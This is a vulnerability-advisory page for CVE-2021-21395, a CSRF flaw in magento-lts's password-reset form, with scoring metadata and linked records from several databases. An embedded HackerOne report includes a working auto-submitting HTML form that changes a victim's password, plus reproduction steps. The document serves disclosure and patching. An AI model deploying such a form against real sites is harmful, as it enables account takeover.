Description
### Impact
Password reset form is vulnerable to CSRF between time reset password link is clicked and user submits new password.
### Patches
PR forthcoming
### Workarounds
None
Affected Software
Related
{"id": "GHSA-R3C9-9J5Q-PWV4", "vendorId": null, "type": "github", "bulletinFamily": "software", "title": "magento-lts Reset Password not protected against well-timed CSRF", "description": "### Impact\n\nPassword reset form is vulnerable to CSRF between time reset password link is clicked and user submits new password.\n\n### Patches\n\nPR forthcoming\n\n### Workarounds\n\nNone", "published": "2023-01-26T19:51:48", "modified": "2023-02-07T21:54:06", "epss": [{"cve": "CVE-2021-21395", "epss": 0.00052, "percentile": 0.18332, "modified": "2023-05-27"}], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://github.com/advisories/GHSA-r3c9-9j5q-pwv4", "reporter": "GitHub Advisory Database", "references": ["https://github.com/OpenMage/magento-lts/security/advisories/GHSA-r3c9-9j5q-pwv4", "https://hackerone.com/reports/1086752", "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "https://packagist.org/packages/openmage/magento-lts", "https://nvd.nist.gov/vuln/detail/CVE-2021-21395", "https://github.com/advisories/GHSA-r3c9-9j5q-pwv4"], "cvelist": ["CVE-2021-21395"], "immutableFields": [], "lastseen": "2023-05-27T15:14:33", "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-21395"]}, {"type": "hackerone", "idList": ["H1:1086752"]}, {"type": "osv", "idList": ["OSV:GHSA-R3C9-9J5Q-PWV4"]}, {"type": "veracode", "idList": ["VERACODE:39290"]}]}, "score": {"value": 1.9, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "openmage/magento-lts", "version": 20}, {"name": "openmage/magento-lts", "version": 20}, {"name": "openmage/magento-lts", "version": 19}]}, "epss": [{"cve": "CVE-2021-21395", "epss": 0.00052, "percentile": 0.18318, "modified": "2023-05-02"}], "vulnersScore": 1.9}, "_state": {"dependencies": 1685227532, "score": 1685200538, "affected_software_major_version": 0, "epss": 0}, "_internal": {"score_hash": "13dfb75b397ae771a64a4a5b7fc3bb04"}, "affectedSoftware": [{"version": "20.0.19", "operator": "lt", "ecosystem": "COMPOSER", "name": "openmage/magento-lts"}, {"version": "19.4.22", "operator": "lt", "ecosystem": "COMPOSER", "name": "openmage/magento-lts"}]}
{"cve": [{"lastseen": "2023-05-27T14:20:12", "description": "Magneto LTS (Long Term Support) is a community developed alternative to the Magento CE official releases. Versions prior to 19.4.22 and 20.0.19 are vulnerable to Cross-Site Request Forgery. The password reset form is vulnerable to CSRF between the time the reset password link is clicked and user submits new password. This issue is patched in versions 19.4.22 and 20.0.19. There are no workarounds.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2023-01-27T16:15:00", "type": "cve", "title": "CVE-2021-21395", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21395"], "modified": "2023-02-07T19:53:00", "cpe": [], "id": "CVE-2021-21395", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21395", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "veracode": [{"lastseen": "2023-05-27T19:56:58", "description": "openmage/magento-lts is vulnerable to Cross-Site Request Forgery (CSRF). The vulnerability exists in the `resetPasswordPostAction` function in `AccountController.php` because the user sessions are not properly managed which allows an attacker to change a user passwords.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2023-02-16T05:58:59", "type": "veracode", "title": "Cross-Site Request Forgery (CSRF)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21395"], "modified": "2023-02-16T15:42:08", "id": "VERACODE:39290", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-39290/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "prion": [{"lastseen": "2023-08-16T01:09:54", "description": "Magneto LTS (Long Term Support) is a community developed alternative to the Magento CE official releases. Versions prior to 19.4.22 and 20.0.19 are vulnerable to Cross-Site Request Forgery. The password reset form is vulnerable to CSRF between the time the reset password link is clicked and user submits new password. This issue is patched in versions 19.4.22 and 20.0.19. There are no workarounds.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2023-01-27T16:15:00", "type": "prion", "title": "CVE-2021-21395", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21395"], "modified": "2023-02-07T19:53:00", "id": "PRION:CVE-2021-21395", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-21395", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "osv": [{"lastseen": "2023-04-11T01:27:19", "description": "### Impact\n\nPassword reset form is vulnerable to CSRF between time reset password link is clicked and user submits new password.\n\n### Patches\n\nPR forthcoming\n\n### Workarounds\n\nNone", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2023-01-26T19:51:48", "type": "osv", "title": "magento-lts Reset Password not protected against well-timed CSRF", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-21395"], "modified": "2023-04-11T01:27:15", "id": "OSV:GHSA-R3C9-9J5Q-PWV4", "href": "https://osv.dev/vulnerability/GHSA-r3c9-9j5q-pwv4", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2023-05-27T15:12:36", "bounty": 0.0, "description": "## Summary:\nHey OpenMage, the forgot password page is not protected against CSRF attack which can lead to changing password. Use the below form to test\n```html\n<html> \n <body>\n <form action=\"https://demo.openmage.org/customer/account/resetpasswordpost/\" method=\"POST\">\n <input type=\"hidden\" name=\"password\" value=\"password123\" />\n <input type=\"hidden\" name=\"confirmation\" value=\"password123\" />\n </form>\n <script>document.forms[0].submit()</script>\n </body>\n</html>\n```\n## Steps To Reproduce:\n\n 1. Go to ```https://demo.openmage.org/customer/account/forgotpassword/```\n 2. Enter your email and ask for password reset link\n 3. Load the password reset link and after loading it close it\n 4. Now load the above form and boom, password will be changed.\n\n## Impact\n\nPassword reset via CSRF", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2021-01-25T14:47:04", "type": "hackerone", "title": "OpenMage: CSRF in changing password after using reset password link", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21395"], "modified": "2021-05-27T08:55:08", "id": "H1:1086752", "href": "https://hackerone.com/reports/1086752", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}